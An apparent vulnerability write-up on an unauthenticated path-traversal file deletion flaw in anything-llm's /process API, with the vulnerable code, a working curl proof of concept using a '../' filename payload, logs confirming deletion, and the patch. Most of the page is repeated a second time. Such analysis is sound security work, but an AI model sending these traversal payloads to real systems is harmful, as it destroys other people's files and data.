anything-llm-arbitrary-file-deletion

Last updated 1 year ago

Was this helpful?

anything-llm-arbitrary-file-deletion

Overview

This vulnerability was reported on by , this affects the [anything-llm] web application which setups an API on port 8888. This API is built using python and flask and contains a vulnerability allowing any unauthenticated user to delete any arbitrary file by sending a POST request to /process endpoint.

Arbitrary File Deletion via Unvalidated Filename Input in /process Endpoint

Taking a quick look at how the API processes this request:

[..snip..]
from scripts.watch.process_single import process_single

[..snip..]

WATCH_DIRECTORY = "hotdir"
@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = content.get('filename')
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

A very high level overview of this is that the application parses the JSON data containing the filename object and pass it to the process_single function.

import os
from .filetypes import FILETYPES
from .utils import move_source

RESERVED = ['__HOTDIR__.md']

# This script will do a one-off processing of a specific document that exists in hotdir.
# For this function we remove the original source document since there is no need to keep it and it will
# only occupy additional disk space.
def process_single(directory, target_doc):
  if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
  
  if os.path.exists(f"{directory}/{target_doc}") is False: 
    print(f"{directory}/{target_doc} does not exist.")
    return (False, f"{directory}/{target_doc} does not exist.")

  filename, fileext = os.path.splitext(target_doc)
  if filename in ['.DS_Store'] or fileext == '': return False
  if fileext == '.lock':
    print(f"{filename} is locked - skipping until unlocked")
    return (False, f"{filename} is locked - skipping until unlocked")

  if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

  FILETYPES[fileext](
    directory=directory,
    filename=filename,
    ext=fileext,
    remove_on_complete=True # remove source document to save disk space.
  )

  return (True, None)

The process_single function as shown above performs some basic check such as checking if the specified file exists on the system or not. It also checks if any of the requested file is a locked file, if it is just skip the processing. There's a special case that if a requested file is not in the allowed extension it attempt to move the requested file to a different directory i.e. failed or processed. As seen below, following piece of code handles the restricted extension in the requested file and call move_source function with failed and remove both set to True and target_doc parameter which is the specified file we sent via JSON body i.e. filename

if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

Checking move_source function, we see that if the remove and failed is set to True it will call os.remove with new_destination_filename as parameter which was filename in the previous code where this function was called.

def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
  if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
    print(f"{new_destination_filename} deleted from filesystem")
    os.remove(f"{working_dir}/{new_destination_filename}")
    return

Proof of Concept

Coming to the vulnerability, as you may have noticed that the application doesn't have any logic to check for path traversal or input sanitization on the filename parameter. The thing is there's a limited impact but if done cleverly the impact is high, for instance we cannot trigger the vulnerability if the filename doesn't have an extension or if the extension is in allowed list as it will not trigger the move_source trigger to perform deletion. So, if we give something like ../../../../../../../etc/passwd it won't work as the file does not have an extension but giving something like ../../../../../../etc/resolv.conf as it will trigger the move_source function because .conf extension isn't allowed.

The reason we are using ../ is because os.remove(f"{working_dir}/{new_destination_filename}") also takes working_dir which is hotdir into consideration

In this case, I will create a file name resolv.conf in /tmp folder and will attempt to delete it:

ζ cp /etc/resolv.conf . 
ζ ls -la resolv.conf 
-rw-r--r-- 1 root root 53 Nov  3 00:30 resolv.conf

ζ curl -X POST -H 'Content-Type: application/json' -d '{"filename":"../../../../../../../tmp/resolv.conf"}' http://localhost:5000/process
{"filename": "../../../../../../../tmp/resolv.conf", "reason": ".conf not a supported file type for conversion. It will not be processed.", "success": false}

Checking the API logs:

python3 wsgi.py
 * Serving Flask app 'api'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
Processing ../../../../../../../tmp/resolv.conf
.conf not a supported file type for conversion. It will not be processed.
../../../../../../../tmp/resolv.conf deleted from filesystem
127.0.0.1 - - [03/Nov/2023 00:30:48] "POST /process HTTP/1.1" 200 -

The file is successfully deleted from the system.

ζ ls -la resolv.conf
ls: cannot access 'resolv.conf': No such file or directory

Fix

A commit was made to the repository to patch this vulnerability and the patched code now sanitizes the specified parameter for any potential of directory traveral:

import os
from flask import Flask, json, request
from scripts.watch.process_single import process_single
from scripts.watch.filetypes import ACCEPTED_MIMES

@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = os.path.normpath(content.get('filename')).lstrip(os.pardir + os.sep)
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

If we see how the modified code is dealing with the payloads that was used to traverse:

>>> os.pardir
'..'
>>> os.pardir + os.sep
'../'
>>> os.pardir + os.sep
'../'
>>> target_filename = os.path.normpath("../../../../../../../password").lstrip(os.pardir + os.sep)
>>> target_filename
'password'
>>> target_filename = os.path.normpath("../../../../../../../password../../../../../").lstrip(os.pardir + os.sep)
>>> target_filename
''

How to Idenitfy Similar Vulnerabilities?

This vulnerability is a cause of improper input validation although it is important to look into the fact how the application process things like files especially if it can somewhow be controlled. Another thing that makes this vulnerability of higher impact is that /process action can be perform unauthenticated, it is important to have some form of authentication if a critical action like this is being offered by API. The best way to look for these kind of vulnerabilities is to see all the file-based actions that application is performing and if we can control any aspect of this process. It is better to narrow it down to functions which handle file-based operations, some of them are listed below:

It is not an exhaustive list as anyone can write their own functions which may be a wrapper around following functions or others.

open()
close()
read()
write()
readline()
seek()
tell()
flush()

Modules:

os
shutil
pathlib
io
csv
json

Previouspython NextCWE-338

Last updated 1 year ago

Was this helpful?

Overview

Arbitrary File Deletion via Unvalidated Filename Input in /process Endpoint

Taking a quick look at how the API processes this request:

[..snip..]
from scripts.watch.process_single import process_single

[..snip..]

WATCH_DIRECTORY = "hotdir"
@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = content.get('filename')
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

A very high level overview of this is that the application parses the JSON data containing the filename object and pass it to the process_single function.

import os
from .filetypes import FILETYPES
from .utils import move_source

RESERVED = ['__HOTDIR__.md']

# This script will do a one-off processing of a specific document that exists in hotdir.
# For this function we remove the original source document since there is no need to keep it and it will
# only occupy additional disk space.
def process_single(directory, target_doc):
  if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
  
  if os.path.exists(f"{directory}/{target_doc}") is False: 
    print(f"{directory}/{target_doc} does not exist.")
    return (False, f"{directory}/{target_doc} does not exist.")

  filename, fileext = os.path.splitext(target_doc)
  if filename in ['.DS_Store'] or fileext == '': return False
  if fileext == '.lock':
    print(f"{filename} is locked - skipping until unlocked")
    return (False, f"{filename} is locked - skipping until unlocked")

  if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

  FILETYPES[fileext](
    directory=directory,
    filename=filename,
    ext=fileext,
    remove_on_complete=True # remove source document to save disk space.
  )

  return (True, None)

if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
  if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
    print(f"{new_destination_filename} deleted from filesystem")
    os.remove(f"{working_dir}/{new_destination_filename}")
    return

Proof of Concept

The reason we are using ../ is because os.remove(f"{working_dir}/{new_destination_filename}") also takes working_dir which is hotdir into consideration

In this case, I will create a file name resolv.conf in /tmp folder and will attempt to delete it:

ζ cp /etc/resolv.conf . 
ζ ls -la resolv.conf 
-rw-r--r-- 1 root root 53 Nov  3 00:30 resolv.conf

ζ curl -X POST -H 'Content-Type: application/json' -d '{"filename":"../../../../../../../tmp/resolv.conf"}' http://localhost:5000/process
{"filename": "../../../../../../../tmp/resolv.conf", "reason": ".conf not a supported file type for conversion. It will not be processed.", "success": false}

Checking the API logs:

python3 wsgi.py
 * Serving Flask app 'api'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
Processing ../../../../../../../tmp/resolv.conf
.conf not a supported file type for conversion. It will not be processed.
../../../../../../../tmp/resolv.conf deleted from filesystem
127.0.0.1 - - [03/Nov/2023 00:30:48] "POST /process HTTP/1.1" 200 -

The file is successfully deleted from the system.

ζ ls -la resolv.conf
ls: cannot access 'resolv.conf': No such file or directory

Fix

A commit was made to the repository to patch this vulnerability and the patched code now sanitizes the specified parameter for any potential of directory traveral:

import os
from flask import Flask, json, request
from scripts.watch.process_single import process_single
from scripts.watch.filetypes import ACCEPTED_MIMES

@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = os.path.normpath(content.get('filename')).lstrip(os.pardir + os.sep)
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

If we see how the modified code is dealing with the payloads that was used to traverse:

>>> os.pardir
'..'
>>> os.pardir + os.sep
'../'
>>> os.pardir + os.sep
'../'
>>> target_filename = os.path.normpath("../../../../../../../password").lstrip(os.pardir + os.sep)
>>> target_filename
'password'
>>> target_filename = os.path.normpath("../../../../../../../password../../../../../").lstrip(os.pardir + os.sep)
>>> target_filename
''

How to Idenitfy Similar Vulnerabilities?

It is not an exhaustive list as anyone can write their own functions which may be a wrapper around following functions or others.

open()
close()
read()
write()
readline()
seek()
tell()
flush()

Modules:

os
shutil
pathlib
io
csv
json